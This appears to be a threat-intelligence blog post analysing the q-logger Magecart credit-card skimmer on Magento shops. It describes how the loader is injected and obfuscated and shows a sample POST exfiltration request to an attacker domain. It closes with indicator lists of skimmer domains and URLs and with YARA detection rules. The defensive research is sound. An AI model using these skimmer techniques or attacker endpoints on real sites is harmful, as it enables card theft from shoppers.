# q-logger skimmer keeps Magecart attacks going **[blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/](https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/)** Threat Intelligence Team October 19, 2021 _This blog post was authored by Jérôme Segura_ Although global e-commerce is continuing to grow rapidly, it seems as though Magecart attacks via digital skimmers have not followed the same trend. This is certainly true if we only look at recent newsworthy attacks; indeed when a victim is a large business or popular brand we typically are more likely to remember it. From a research standpoint, we have observed certain shifts in the scope of attacks. For instance, the different threat actors are continuing to expand and diversify their methods and infrastructure. In a [blog post about Magecart Group 8, we documented some of the various](https://blog.malwarebytes.com/threat-intelligence/2021/09/the-many-tentacles-of-magecart-group-8/) web properties used to serve skimmers and exfiltrate stolen data. But at the end of the day, we only know about attacks that we can see, that is until we discover more. Case in point, one particular skimmer identified as q-logger, has been active for several months. But it wasn’t until we started digging further that we realized how much bigger it was. ## Q-logger origins ----- [This skimmer was originally flagged by Eric Brandel as q-logger. Depending on how much](https://twitter.com/AffableKraut/status/1385030485676544001?s=20) you enjoy parsing JavaScript you may have a love/hate relationship with it. The code is dense and using an obfuscator that is as generic as can be, making identification using signatures challenging. Thanks to some data from [@sansecio I've come across a new(?) digital](https://twitter.com/sansecio?ref_src=twsrc%5Etfw) [skimmer/#magecart I call "q-logger". It has a variety of features, the most peculiar may](https://twitter.com/hashtag/magecart?src=hash&ref_src=twsrc%5Etfw) be the secondary keylogger it uses to try and defend against inspection. 1/16 [pic.twitter.com/ME80KMrNg5](https://t.co/ME80KMrNg5) — Eric Brandel (@AffableKraut) [April 22, 2021](https://twitter.com/AffableKraut/status/1385030485676544001?ref_src=twsrc%5Etfw) This skimmer can be found loaded directly into compromised e-commerce sites. However, in the majority of cases we found it loaded externally. ## The loader The loader is also an encoded piece of JavaScript that is somewhat obscure. It is injected inline within the DOM right before the text/x-magento-init tag or separated by copious amounts of white space. One way to understand what the code does is by using a debugger and setting a breakpoint at a particular spot. It is best to either use an already compromised site or bypass the check for the address bar (onestepcheckout) ----- We can now see the purpose of this script: it is to load the proper skimmer. ## The skimmer As mentioned previously, the skimmer is quite opaque and makes debugging effort difficult and lengthy. ----- To cut to the chase, the skimmer exfiltrates data via a POST request to the same domain name where the JavaScript is loaded from. ``` POST https://filltobill5.casa/ HTTP/1.1 Host: filltobill5.casa [obfuscated data] ``` ----- ## Threat actor and victims We were able to collect a few indicators from the threat actor behind this campaign. One was [the use of netmail.tk, also observed by Luke Leal, for registering skimmer domains.](https://lukeleal.com/research/posts/analiticsweb-skimmer/) Although there are clusters of domains from the same registrant, we see that they are trying to compartmentalize their infrastructure and hide the hosting provider’s true IP address. They [also register domains en masse, which allows them to defeat traditional blocklists.](https://twitter.com/AffableKraut/status/1415425137554382852?s=20) We don’t have a good estimate of how prevalent this campaign is, but we certainly run into it regularly while monitoring e-commerce sites for malicious code. The victims are various small businesses with an online shop running Magento. ## Conclusion The large number of e-commerce sites that are running outdated versions of their CMS is a low hanging fruit for threat actors interested in stealing credit card data. In a sense, there is always a baseline of potential victims that can be harvested. ----- And every now and again, some opportunities appear. They could be as simple as a zeroday in a plugin or CMS, or maybe an entry point into more valuable targets via a supplychain attack. Threat actors are always ready to pounce on those and may well have established their infrastructure ahead of time, waiting for such opportunities. Malwarebytes customers are protected against this skimmer. ## Indicators of Compromise **Email addresses (registrant)** wxugvvvu@netmail[.]tk isgskpys@netmail[.]tk zulhqmnr@netmail[ ]tk ----- yzzljjkmc@emlhub[.]com foyiy11183@macosnine[.]com **Skimmer domains** adminet[.]site adminet[.]space amasterweb[.]site analistcloud[.]space analistnet[.]site analistnet[.]space analistsite[.]site analistsite[.]space analisttab[.]site analisttab[.]space analistweb[.]site analistweb[.]space analitic-tab[.]site analitic-tab[.]space analiticnet[.]site analitics-tab[.]site analiticsnet[.]site analiticstab[.]site analiticstab[.]space analitictab[.]site analitictab[.]space analiticweb[.]site analizeport[.]site analizerete[.]site analylicweb[.]site analystclick[.]site analysttraffic[.]site analystview[.]site analystweb[.]site analyticlick[.]site analyticmanager[.]site analyticview[.]site aneweb[.]site bublegum[.]xyz cdnetworker[.]site cleanerjs[.]site clickanalyst[.]site clickanalytic[.]site ----- cloudtester[.]site cocolatest[.]sbs commenter[.]site connectweb[.]space domainclean[.]site domainet[.]site domainet[.]space fastester[.]site fastjspage[.]site fastupload[.]site filltobill5[.]casa foosq[.]one foundanalyst[.]site foundanalytic[.]site fullka[.]online goos1[.]store gudini[.]cam hardtester[.]site hostcontrol[.]space httpanel[.]site indokitel[.]xyz interage[.]site ipcounter[.]space itoltuico[.]cyou itsector[.]date jscleaner[.]site lanetester[.]site lanlocker[.]site linkerange[.]site linkerange[.]space listmanager[.]space loockerweb[.]site magengine[.]site managerage[.]site managerage[.]space managertraffic[.]site mariaschool[.]xyz masterlinker[.]site masternet[.]space masterport[.]site mediaconservative[.]xyz minanalize[.]site ----- minimazerjs[.]site netanalist[.]site netanalist[.]space netanalisttest[.]space netanalitic[.]site netanalitic[.]space netanalitics[.]site netcontrol[.]site netpanel[.]site netstart[.]space nettingpanel[.]site nettingtest[.]site nettraffic[.]site ollaholla[.]cyou onehitech[.]casa ownerpage[.]site pagecleaner[.]site pagegine[.]site pageloader[.]site pagenator[.]site pagestater[.]site pagesupport[.]site panelake[.]site panelake[.]space panelan[.]site panelblock[.]site panelnetting[.]site panelocker[.]site pinokio[.]online planetspeed[.]site producteditor[.]site retenetweb[.]site rokki[.]club saverplanel[.]site sectimer[.]site securefield[.]site seeweb[.]space sentech[.]cyou showproduct[.]site siteanalist[.]site siteanalist[.]space ----- siteanalitic[.]site siteanalitics[.]site siteanalyst[.]site siteanalytic[.]site sitengine[.]site sitesecure[.]space sitetraffic[.]site slickclean[.]site slotmanager[.]site slotshower[.]site smallka[.]cam smalltrch[.]cc soorkis[.]one spaceclean[.]site spacecom[.]site speedstress[.]site speedtester[.]site speedtester[.]space sslmanager[.]site starnetting[.]site statetraffic[.]site statsclick[.]site storepanel[.]site suporter[.]site tab-analitic[.]site tab-analitic[.]space tab-analitics[.]site tab-analitics[.]space tabanalist[.]site tabanalist[.]space tabanalitic[.]site tabanalitic[.]space tabanalitics[.]site tabanalitics[.]space targetag[.]space telanet[.]site telanet[.]space trafficanalyst[.]site trafficanalytics[.]site trafficcloud[.]site trafficsanalist[.]site trafficsee[.]site ----- trafficweb[.]site truetech[.]cam unpkgtraffic[.]site veeneetech[.]world versionhtml[.]site viewanalyst[.]site viewanalytic[.]site webanalist[.]site webanalist[.]space webanalitic[.]site webanalitics[.]site webanalylic[.]site webanalyst[.]site webmode[.]site webmoder[.]space welltech[.]bar welltech[.]monster welltech[.]rest **Skimmer URLs** filltobill5[.]casa/state-3.9.min.js welltech[.]bar/state-5.0.7.js veeneetech[.]world/tag-2.7.js goos1[.]store/openapi-3.3.min.js goos1[.]store/animate-1.6.9.min.js mariaschool[.]xyz/openapi.min.js pagecleaner[.]site/state.min.js foosq[.]one/mobile.js pinokio[.]online/slick-3.4.min.js truetech[.]cam/screen-4.6.min.js onehitech[.]casa/tags-3.0.7.js rokki[.]club/mobile-1.3.min.js bublegum[.]xyz/libs.min.js fastjspage[.]site/utils.js fastester[.]site/waypoints.min.js versionhtml[.]site/openapi-4.1.js itoltuico[.]cyou/library-3.6.js adminet[.]site/utils.js ollaholla[.]cyou/common-4.1.js indokitel[.]xyz/current.min.js panelake[.]site/tag.js ----- gudini[.]cam/libs-2.0.js fullka[.]online/dropdowns-1.6.min.js welltech[.]monster/mobile-2.3.min.js welltech[.]rest/widget.min.js sentech[.]cyou/widget.min.js smalltrch[.]cc/plugin-1.9.7.js soorkis[.]one/widget-3.6.7.js analistcloud[.]space/common.js smallka[.]cam/plugin-1.1.3.js loockerweb[.]site/common.js mediaconservative[.]xyz/script.js itsector[.]date/waypoints.min.js **YARA rules** ``` rule qlogger_loader_WebSkimmer : Magecart WebSkimmer { meta: author = "Malwarebytes" description = "Magecart (q-logger loader)" source = "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-loggerskimmer-keeps-magecart-attacks-going/" date = "2021-10-19" strings: $regex = /"load",function\(\)\{\(function\(\)\{/ $regex2 = /while\(!!\[\]\)\{try{var/ $regex3 = /\(\w\['shift'\]\(\)\);\}\}\}/ condition: all of them } rule qlogger_skimmer_WebSkimmer : Magecart WebSkimmer { meta: author = "Malwarebytes" description = "Magecart (q-logger skimmer)" source = "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-loggerskimmer-keeps-magecart-attacks-going/" date = "2021-10-19" strings: $regex = /return\(!!window\[\w{2}\(/ $regex2 = /\w\(\)&&console\[/ condition: all of them } ``` -----